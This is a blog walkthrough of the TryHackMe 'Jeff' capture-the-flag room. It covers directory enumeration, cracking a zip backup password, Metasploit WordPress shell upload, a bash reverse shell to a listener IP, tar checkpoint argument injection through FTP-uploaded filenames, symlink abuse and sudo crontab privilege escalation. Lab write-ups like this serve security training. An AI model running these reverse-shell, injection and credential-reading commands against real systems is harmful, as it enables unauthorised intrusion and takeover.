Complete TryHackMe Jeff Walkthrough

Today in this writeup I gonna solve the TryHackMe Jeff Room it is a Hard room and I spend around two days on it and got some help from the community bypassing docker. Complete the jeff challenge lets get started.

TryHackMe Jeff Walkthrough
TryHackMe Jeff Walkthrough

TryHackMe Jeff Walkthrough

Complete TryHackMe Jeff Walkthrough

Answer the questions below

Hack the machine and obtain the user.txt flag.

HAck It

Escalate your privileges, whats the root flag?

HAck it

Attack Description

Hi guys today I will explain how to complete the TryHackMe Room Jeff. When the machine boots scan the host using nmap and try to detect the open ports and services running on port 22 and 80. if we open the IP on firefox we notice it redirects to jeff.thm, add this host on /etc/hosts.


┌──(kali㉿PopLabSec)-[~]
└─$ sudo echo "10.10.10.125    jeff.thm" >> /etc/hosts
Complete TryHackMe Jeff Walkthrough

Scan the Host

After add the IP address in hosts file it’s time scann the host using nmap. As we can see we have two open ports.

Complete TryHackMe Jeff Walkthrough

On port 22 we have SSH 7.6p1 server running and on port 80 nginx as webserver. Let’s enumerate the webserver in order to find files and folders to investigate.

NGINX Enumeration

Open the jeff.thm domain on Firefox and investigate the website, I can’t find nothing usefull on source code or robots.txt. Let’s use gobuster and enumerate system folders.

Complete TryHackMe Jeff Walkthrough

Bruteforcing Folders using gobuster

Open your terminal and execute the following command to find folders on NGINX webserver.


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
Complete TryHackMe Jeff Walkthrough

The gobuster output detect some interesting folders, now let’s try to search jucy files inside each folder.

Admin Folder

Execute gobuster command to search for files inside admin folder:


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/admin/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt 
Complete TryHackMe Jeff Walkthrough

Nothing usefull inside tryhackme jeff admin folder, we just get the admin login page, i’ve tryed to brute force it without sucess.

Assets Folder

It’s time enumerate the backup folder, execute:

┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/assets/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough 84

Backups folder was empty, move to the next folder.

Uploads Folder

┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/uploads/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
Complete TryHackMe Jeff Walkthrough

BackUp Folder


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/backups/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt
Complete TryHackMe Jeff Walkthrough

After searching for files inside all detected folders only the backups folder gave me something interesting a backup.zip file, let’s download the file.

Download Backup.zip file

┌──(kali㉿PopLabSec)-[~]
└─$ wget http://jeff.thm/backups/backup.zip
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough 85

┌──(kali㉿PopLabSec)-[~]
└─$ unzip backup.zip 
Complete TryHackMe Jeff Walkthrough
┌──(kali㉿PopLabSec)-[~]
└─$ zip2john backup.zip > backup.hash
Complete TryHackMe Jeff Walkthrough
┌──(kali㉿PopLabSec)-[~]
└─$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough

After unzip the backup.zip file with correct password we have a backup file from a WordPress blog.

cat wpadmin.bak 
Complete TryHackMe Jeff Walkthrough

Inside the backup file we have a wordpress password

Enumerate VHOSTS

gobuster vhost -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough

Attack WordPress

After we add the new virtaul host info inside our /etc/hosts file we can access a new blog on the same server using WordPress CMS, if you have doubts on how to attack WordPress webite read my article about it.

┌──(kali㉿PopLabSec)-[~]
└─$ firefox http://wordpress.jeff.thm
Complete TryHackMe Jeff Walkthrough

Here we notice a one WordPress user called Jeff.

Complete TryHackMe Jeff Walkthrough

Let’s test our credentials

username : jeff - found as wordpress user
password : XXX-RFS-XXX password was found inside wpadmin.bck file
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough
wpscan --url http://wordpress.jeff.thm -e u

Get a Reverse Shell

metasploit
msf6 > use unix/webapp/wp_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > options
Complete TryHackMe Jeff Walkthrough
set PASSWORD XXX-RFS-XXX
set USERNAME jeff
set RHOSTS wordpress.jeff.thm
run
Complete TryHackMe Jeff Walkthrough
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.154.49/6666 0>&1'");
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough 86
nc -lpn 6666
Complete TryHackMe Jeff Walkthrough

Complete TryHackMe Jeff Walkthrough

ftp_backup.php

Bypass Docker Container

use exploit/multi/handler
set lhost tun0
set lport 4444
curl -v -P - -T "/var/www/html/shell.sh" 'ftp://backupmgr:[email protected]/files/'
curl -v -P - -T "/var/www/html/--checkpoint=1" 'ftp://backupmgr:[email protected]/files/'
curl -v -P - -T "/var/www/html/--checkpoint-action=exec=sh shell.sh" 'ftp://backupmgr:[email protected]/files/'
Complete TryHackMe Jeff Walkthrough
[email protected]:~/.ftp/files$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:~/.ftp/files$ export TERM=xterm
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough
[email protected]:/opt/systools$ ln -sf /var/backups/jeff.bak message.txt
Complete TryHackMe Jeff Walkthrough
[email protected]:/opt/systools$ ssh [email protected] -t "bash -l"
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough
[email protected]:~$ export PATH=/bin:/usr/bin:/usr/sbin:/usr/local/bin
[email protected]:~$ /bin/cat user.txt
THM{HashMeLikeOneOfYour-RFS}
Complete TryHackMe Jeff Walkthrough

Privilege Escalation

[email protected]:~$ /usr/bin/sudo -l
Complete TryHackMe Jeff Walkthrough
[email protected]:~$ sudo /usr/bin/crontab -e
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough
Complete TryHackMe Jeff Walkthrough

TryHackMe WebAppSec 101Walkthrough

TryHackMe Jason Writeup

TryHackMe Vulnerability Capstone

Linux PrivEsc TryHackMe WriteUp

TryHackMe Net Sec Challenge Writeup

TryHackMe Blog Room Walktrough

TryHackMe Jeff Room

7.3 out of 10
€0
Complete TryHackMe Jeff Walkthrough

Can you hack Jeff’s web server?

Stability
7/10
Access
4/10
Technology
8/10
Price
10/10

Pros

Multi Steps

Linux Shells

Docker

Cons

Need Web Access

Easy Root PrivEsc